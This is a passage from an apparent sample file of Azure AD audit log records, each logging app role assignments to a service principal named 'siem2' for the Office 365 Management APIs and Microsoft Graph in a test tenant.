"", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, 
{"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": 
"User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": 
"env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": 
"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8821342Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622751"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": 
"env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "411fc666-cabf-4cb0-b8a3-e5a2cc515b79"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem2"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "ServicePrincipal.AppId"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": 
"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": 
"{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.8071361Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622707"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "256e3859-87ca-4b23-b2c0-45a26ccd7925"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:41", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": 
"1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", "OldValue": "", "NewValue": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"NewValue": "siem2", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": 
"1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"DisplayName\":\"siem2\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Name\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:41.9571526Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622781"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", 
"Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "a4a12952-3467-4d48-9950-48b4b9ac87b3"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Microsoft Graph"}, {"Type": 2, "ID": "00000003-0000-0000-c000-000000000000"}, {"Type": 4, "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us"}], "ObjectId": 
